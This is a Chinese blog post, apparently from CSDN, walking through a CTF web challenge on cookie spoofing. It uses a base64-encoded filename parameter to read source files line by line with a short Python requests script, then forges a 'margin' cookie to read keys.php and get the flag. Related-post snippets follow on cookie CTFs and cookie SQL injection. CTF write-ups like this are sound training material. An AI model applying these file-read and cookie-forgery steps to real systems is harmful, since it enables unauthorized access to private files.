CTFweb篇-Cookies欺骗

最新推荐文章于 2023-09-14 22:49:40 发布
最新推荐文章于 2023-09-14 22:49:40 发布
阅读量1.8w 收藏 12
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/107848246
版权

什么是cookie

其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。
cookie可以在报文头的前面进行设置。
例题:
在这里插入图片描述

打开是一连串字母,没有用处

于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

filename是编码了的,一般是base64,解码后是keys.txt

进文件看一看
在这里插入图片描述

又是一串数字,貌似没有用了。好像没有其它方法了。
再看URL,发现有参数line和filename,line可能是行号解析,filename是文件名,改一下行号,改为1
在这里插入图片描述
发现没有现象,猜测可能keys.txt只有一行,而且flag没在这个里面。除了keys.txt外,还有index.php文件,我们把它base64编码后查看一下,其编码为:aW5kZXgucGhw
于是弄一个访问:http://123.206.87.240:8002/web11/index.php?line=0&filename=aW5kZXgucGhw,发现没有输出,可能是php的头行<?php 不能echo导致,将line换为1http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw
在这里插入图片描述
拿到了源码,这样一句一句拿肯定很慢,于是用python的Request进行自动化脚本

import requests
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"
mysession = requests.session()
s = ''
for i in range(0, 40):
    r = mysession.get(url1+str(i)+url2)  # 读取每一行代码
    s = s + r.text
print(s)

得到了index.php的源码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");//重定向到index.php
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

error_reporting(0)是不对php报错
:?是三元运算符
经过分析,只要文件名file为keys.php并且键值对都为margin的cookie就能得到keys.php的内容
这里我们用burpsuite来改包
在这里插入图片描述
在回应中就得到了flag
在这里插入图片描述

总结

cookie可以篡改,要擅于从URL中找到切入点。

weixin_44597701
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 cookie 解题详析
等风来
05-20 4800
使用Burp Suite抓包可以更全面地查看HTTP响应及其它与网络通信相关的信息,具体操作本文不再赘述。题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:这是夹心饼干的意思吗?HTTP响应通常可以在浏览器的开发者工具中找到。根据提示,获取页面Cookie中的数据即可。如图,flag存在于。
CTFHUB-WEB前置技能-HTTP协议-Cookie
K_ShenH的博客
06-09 772
CTFHUB-WEB前置技能-HTTP协议-Cookie
ctf-攻防世界-web:cookie
一只菜鸟的博客
11-01 4094
提示在cookie里放了东西,那么就去查看cookie吧。F12打开开发者工具,在储存里有名为look-here,值为cookie.php的cookie 访问cookie.php,提示See the http response,即查看http返回包。 在开发者工具的网络一栏查看cookie.php,即可发现flag 或者用burp抓包,右键send to repeater 可查看返回包的headers发现flag ...
CTF学习之0基础入门笔记(二)
Queen_is_king的博客
07-11 1608
这一节需要花费记得东西多一点,并且主要是靶场的搭建,本人在搭建靶场过程中,主要用虚拟机,下面介绍了四种靶场,并在虚拟机上应用的方法,后续会继续讲怎么用这几种靶场。HTTP 协议(Hypertext Transfer Protocol,超文本传输协议),是一个客户端请求和响应的标准协议,这个协议详细规定了浏览器和万维网服务器之间互相通信的规则。用户输入地址和端口号之后就可以从服务器上取得所需要的网页信息。通俗来讲,HTTP协议作用的大致如下:所有HTTP消息(请求与响应)中都包含一个或者几个单行现实的消息头,
CTF攻防世界web题思路解析4cookie.
m0_63687631的博客
12-22 827
1.打开网站 2.查找什么是cookie然后查找得到如何得到的方法;先查看源码 3.在控制台中输入 4.然后得到界面在网址栏输入/cookie.php并访问 5.访问出这个,查看http响应 6.如图在网络中找到http相应得到的消息头即可获得flag 知识点: A cookie是服务器发给浏览器的一个身份验证信息的一个值 B 获得方式有通过控制器输入 document.cookie和网络中获得 ...
CTF之web——cookie
weixin_61167540的博客
11-23 1734
在cmd中输入:curl -i http://challenge-5460ffbe35aa75a0.sandbox.ctfhub.com:10800/ --cookie "admin=1"这里之所以设置cookie为admin=1,是因为上图中看到网页的请求头里admin=0,也就是设置的不是admin用户去访问的,改成1就好啦。cookie是存储再客户端上的一小段数据,浏览器(即客户端)通过HTTP协议和服务器端进行cookie交互,通常用来存储一些不敏感信息。
vue-cookies:一个简单的Vue.js插件,用于处理浏览器Cookie
04-29
npm install vue-cookies --save // require var Vue = require('vue') Vue.use(require('vue-cookies')) // es2015 module import Vue from 'vue' import VueCookies from 'vue-cookies' Vue.use(VueCookies) // ...
react-native-cookies:React Native的Cookie管理器
02-04
安装yarn add react-native-cookies连结中自动(推荐) react-native link react-native-cookies手册如果自动链接不起作用,则可以按照以下说明手动链接此库:的iOS 在Xcode中打开您的项目,右键单击“ Libraries ,...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
web-ctf-help:脚本集,以帮助基于Web的ctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
react-cookies:使用React加载和保存Cookie
05-02
React饼干使用React加载和保存Cookie安装$ yarn add react-cookies原料药.setCookie(名称,值,[选项]) 设置一个cookie。名称Cookie名称类型: string 必需的价值Cookie值类型: any 必需的选项支持所有cookie选项...
BugkuCTF-WEB题cookie欺骗
am_03的博客
08-29 876
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
CTF学习记录006-Cookie欺骗、认证、伪造
最新发布
wupeng_ccab的博客
09-14 690
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
[CTF攻防世界] WEB区 关于Cookie的题目
weixin_43586169的博客
04-14 1717
描述关于Cookie的题目
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 1643
根据网页显示内容提示,这题关于 Cookie 注入,Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFhub技能书解题笔记-Cookie
qq_43006864的博客
12-09 1459
一:打开题目,主页给出的提示是,仅仅只有admin用户,才能看到flag 二、这里我们还是打开burpsuit,抓包看一下数据包。通过对该页面进行抓包,发现了cookie位置的值为:admin=0。那么可以理解为现在是因为admin=0,所以我们非admin用户,就无法看倒flag。 这里因为0和1通常用来表示“否”和“是”,所以这里我们将0改为1。 得到flag ...
CTF题1
qq_41409656的博客
01-18 924
题1: robot 根据提示直接去访问robots.txt这个文件直接http://106.75.86.18:1111/robots.txt​在访问http://106.75.86.18:1111/admin/3she11.php查看源码 获得flag题2:seelog 看日志根据提示直接去访问log直接访问​http://106.75.86.18:3333/log​在访问access.log,通
ctf题解——sql注入(cookie注入)
ckkkkkkkkke的博客
10-31 849
1.知识点   cookie注入的原理是:就要修改cookie的值,我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。   相对post和get方式注入来说,cookie注入就要稍微繁琐一些了,要进行cookie注入,我们首先就要修改cookie,这里就需要使用到Javascript语言
WHUCTF easyphp代码审计
weixin_44255856的博客
06-09 1779
JSON 数据结构介绍: 按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett 但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如: { "firstName": "Brett", "lastName":...
vue-cookies
08-08
Vue-cookies是一个用于在Vue.js应用程序中管理浏览器cookies的插件。它提供了一些方便的方法来读取、写入和删除cookies。您可以使用Vue-cookies来存储用户的身份验证令牌、用户首选项或其他需要在浏览器中进行持久化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值